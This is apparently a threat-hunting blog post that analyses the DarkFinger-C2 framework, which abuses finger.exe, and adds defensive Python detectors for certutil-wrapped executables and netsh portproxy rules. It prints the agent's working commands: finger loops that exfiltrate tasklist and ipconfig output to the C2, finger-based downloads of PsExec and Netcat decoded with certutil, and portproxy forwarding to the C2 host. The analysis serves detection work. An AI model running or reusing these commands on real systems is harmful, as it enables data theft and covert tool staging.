Understanding & Detecting C2 Frameworks — DarkFinger-C2

DarkFinger-C2

FINGER.EXE

“finger.exe”
finger root@172.22.207.194
“finger.exe” result
#[Server Portion]
import socket

s = socket.socket()                    # IPv4 / TCP
s.bind(("192.168.242.131", 79))        # finger listens on TCP/79
s.listen(5)
conn, addr = s.accept()                # one client connection, e.g. finger.exe
data = conn.recv(4096).decode()        # a finger query is just "<user>\r\n"
print(data)                            # prints "random_data" for the client below
conn.close()
s.close()

#[Client Side]
finger random_data@192.168.242.131

DarkFinger-C2.py

“DarkFinger-C2.py” Help
“DarkFinger-C2.py” Source
import argparse

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    main(parser.parse_args())

main(args)

main

create_base64_files()

“create_base64_files”
PsExec.exe
Ncat.exe
import os

downloads_dir = "Darkfinger_Downloads"
path = os.getcwd()
# the encoded copies of the tools are written under <cwd>\Darkfinger_Downloads
if not os.path.exists(path + "\\" + downloads_dir):
    os.makedirs(downloads_dir)
certutil.exe -encode "path\\x" "path\\downloads_dir\\x[:2].lower().txt"
  • path = Current working directory
  • downloads_dir = “Darkfinger_Downloads”
  • x = Name of the tool from the config file
certutil.exe -encode "[DarkFinger-C2 Path]\\PsExec.exe" "[DarkFinger-C2 Path]\\Darkfinger_Downloads\\ps.txt"
-----BEGIN CERTIFICATE-----
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA7paLxf8TMon/EzKJ/xMyi
y1g9onXEzKLLWD+i78TMostYPqJmxMyiLazIo2zEzKItrM+jbMTMoi2syaNYxMyi
drxfonDEzKJ/xM2ip8TMotqtyaN9xMyi2q3Io3jEzKLarTOifsTMon/EW6J+xMyi
2q3Oo37EzKJSaWNof8TMogAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUA
.......
.......
.......
/fy7QawdfM0iwuYSrNGykJIfFwESDbhJlpfBENmhOHX4eurV4nCSghnI4+t58/DN
t2ew7XM1xXCEsU797aU7ZGiuW2gOWtZP005G3eMhA8zcrCTDbcRNCxbxrAvBiMCu
2GaQCw7/3QoEz64fjG0TMpIdOZ5EcsdnvAEWtkGPvBmPhex7iBuAbRzeC3xxF3MR
dxRaConyGOo9zVQdINyl40XeuojtUY4frdTKoRBiN4vzNySpvH65uDrcUbWCQRng
C+TsH2nwowysuRYThcCOXYjXlgAAAAAA
-----END CERTIFICATE-----
“remove_cert_info”

fileppe_fingaz()

  • If the data sent by the agent is surrounded with a “!” this means that a port change request was made.
  • If the data sent by the agent starts with a “.” this indicates that the agent wants to exfiltrate data from the infected machine.
  • If the data starts with “ps” or “nc” this indicates the agent wants to download “PsExec” or “Netcat” respectively. (Note that by default these are the only tools supported.)
finga_that_box
Global variables

DarkFinger-C2-Agent.bat

Agent Source
CD \Users\%username%\Desktop
net session >nul 2>&1
IF %errorLevel% == 0 (
    ECHO [+] Got Admin privileges!.
    SET /a Admin = 0
    GOTO Init
) ELSE (
    ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!.
    SET /a Admin = 1
    SET DARK_PORT=79
    GOTO CheckOutbound79
)
cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}"
  • DARK_IP = C2 IP
  • DARK_PORT = 79
for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b
SET LOCAL_IP=%LOCAL_IP: =%
Process creation event “cmd.exe”
Process creation event for “ipconfig” & “find”
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F  >nul 2>&1
cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%
cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
  • LOCAL_IP = Is the local IP of the host
  • LOCAL_FINGER_PORT = 79
  • DARK_PORT = The port that the C2 is listening on
  • DARK_IP = C2 IP
  • LOCAL_IP = 10.10.10.10
  • LOCAL_FINGER_PORT = 79
  • DARK_PORT = 443
  • DARK_IP = 10.10.10.200
# Anything coming from the C2
10.10.10.10:443 ------[Proxy]------> 10.10.10.10:79
# Anything sent from the client to the C2
10.10.10.10:79 ------[Proxy]------> 10.10.10.200:443
Command Options

PsExec64 / Nc64

#Download PsExec
finger ps%DELAY%@%IP2USE% > tmp.txt
#Download Netcat
finger nc%DELAY%@%IP2USE% > tmp.txt
# %Tool% can be either "PS" or "NC"
cmd /c more +2 tmp.txt > %Tool%.txt
# %CD% == Current Directory
cmd /c del %CD%\tmp.txt
certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul
cmd /c del %CD%\%Tool%.txt
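Both halves of the tool transfer, the server's "create_base64_files" step (certutil -encode writing ps.txt / nc.txt) and the agent's "certutil -decode" step shown just above, rely on the same layout: a CERTIFICATE header and footer around base64 broken into 64-character lines. The following added example (my code, not the project's) reproduces that layout so a defender can recognise it, and checks whether a blob in that layout decodes to a PE (MZ header and the DOS stub string). The fake PE bytes are constructed; the one real input is the first base64 line of the ps.txt shown earlier on this page.

```python
import base64

BEGIN = "-----BEGIN CERTIFICATE-----"
END = "-----END CERTIFICATE-----"

# Constructed stand-in for a PE: MZ signature, padding, the DOS stub message.
FAKE_PE = (b"MZ\x90\x00" + b"\x00" * 60
           + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 16)

# First base64 line of the certutil-encoded PsExec shown on this page.
PAGE_FIRST_LINE = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"


def certutil_encode(data: bytes) -> str:
    """Reproduce the layout of `certutil -encode`: CERTIFICATE header/footer,
    base64 in 64-character lines, CRLF line endings."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([BEGIN, *lines, END]) + "\r\n"


def certutil_decode(text: str) -> bytes:
    """Undo the layout above (what `certutil -decode` does with it): ignore
    the header/footer lines and decode the remaining base64. Also accepts
    header-less base64, as the agent's tmp.txt may contain."""
    body = [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.strip().startswith("-----")]
    return base64.b64decode("".join(body))


def looks_like_wrapped_pe(text: str) -> bool:
    """Detection check: does this CERTIFICATE-wrapped text decode to a PE?
    Real certificates decode to DER (first byte 0x30), never to 'MZ'."""
    try:
        data = certutil_decode(text)
    except (ValueError, base64.binascii.Error):
        return False
    return data[:2] == b"MZ" and b"This program cannot be run in DOS mode" in data


if __name__ == "__main__":
    wrapped = certutil_encode(FAKE_PE)
    print(wrapped)
    print("wrapped PE:", looks_like_wrapped_pe(wrapped))
    print("page line decodes to:", certutil_decode(PAGE_FIRST_LINE)[:2])
```

The practical use is on the artifacts this page names: a file in a Darkfinger_Downloads directory, a ps.txt or nc.txt next to a freshly created ps.EXE or nc.EXE, or a large finger response captured on the wire. Any of them passing looks_like_wrapped_pe is worth an alert, since a CERTIFICATE-wrapped executable is not something certutil is used for legitimately.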

ExfilTasklist / ExfilIPConfig

  • tasklist
  • ipconfig
cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP%
“finger” Exfiltration
cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do  finger ".%%a"@%USE_IP%

RemNetShPortProxy / DelProxyNClose

REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1

ChgC2ServerPort

finger !%TMP_PORT%!@%LOCAL_IP%

ShowPortProxy

netsh interface portproxy show all
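The two portproxy rules the agent adds are what make finger.exe (which only speaks TCP/79) reach a C2 on any port, so the "netsh interface portproxy show all" output above is a good place to hunt. The following added example (my code, not the project's) parses that output, flags rules that involve port 79 or forward to a non-local host, and follows each rule's connect endpoint into the other rules to expose the double hop drawn earlier (10.10.10.10:443 -> 10.10.10.10:79 -> 10.10.10.200:443). The netsh output is constructed to match the example values on this page.

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed `netsh interface portproxy show all` output for the two rules
# the agent adds with the example values from this page.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.10.10.10     79          10.10.10.200    443
10.10.10.10     443         10.10.10.10     79
"""

Endpoint = Tuple[str, int]
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(output: str) -> Dict[Endpoint, Endpoint]:
    """Map each listen endpoint to its connect endpoint. Header and separator
    lines do not match ROW (their second column is not numeric)."""
    rules: Dict[Endpoint, Endpoint] = {}
    for line in output.splitlines():
        m = ROW.match(line.strip())
        if m:
            rules[(m.group(1), int(m.group(2)))] = (m.group(3), int(m.group(4)))
    return rules


def find_chains(rules: Dict[Endpoint, Endpoint]) -> List[List[Endpoint]]:
    """Follow connect endpoints that are themselves listeners; return every
    path longer than one rule (a rule pointing at another rule)."""
    chains = []
    for listen in rules:
        hops = [listen]
        seen: Set[Endpoint] = {listen}
        nxt = rules[listen]
        while nxt in rules and nxt not in seen:
            hops.append(nxt)
            seen.add(nxt)
            nxt = rules[nxt]
        hops.append(nxt)
        if len(hops) > 2:
            chains.append(hops)
    return chains


def flag_rules(rules: Dict[Endpoint, Endpoint], local_ips: Set[str]) -> List[str]:
    """Simple hunting heuristics: finger's port on either side, or a
    forward to a host that is not this machine."""
    findings = []
    for (la, lp), (ca, cp) in rules.items():
        if lp == 79 or cp == 79:
            findings.append(f"finger port in portproxy rule {la}:{lp} -> {ca}:{cp}")
        if ca not in local_ips:
            findings.append(f"portproxy forwards off-host {la}:{lp} -> {ca}:{cp}")
    return findings


if __name__ == "__main__":
    rules = parse_portproxy(SAMPLE_NETSH_OUTPUT)
    for finding in flag_rules(rules, {"10.10.10.10", "127.0.0.1"}):
        print(finding)
    for chain in find_chains(rules):
        print(" -> ".join(f"{a}:{p}" for a, p in chain))
```

The same rules persist in the registry key the agent deletes on cleanup (HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4), so a host where the netsh output is empty but that key was recently created or deleted is equally interesting; on an ordinary workstation the expected number of portproxy rules is zero.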

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.
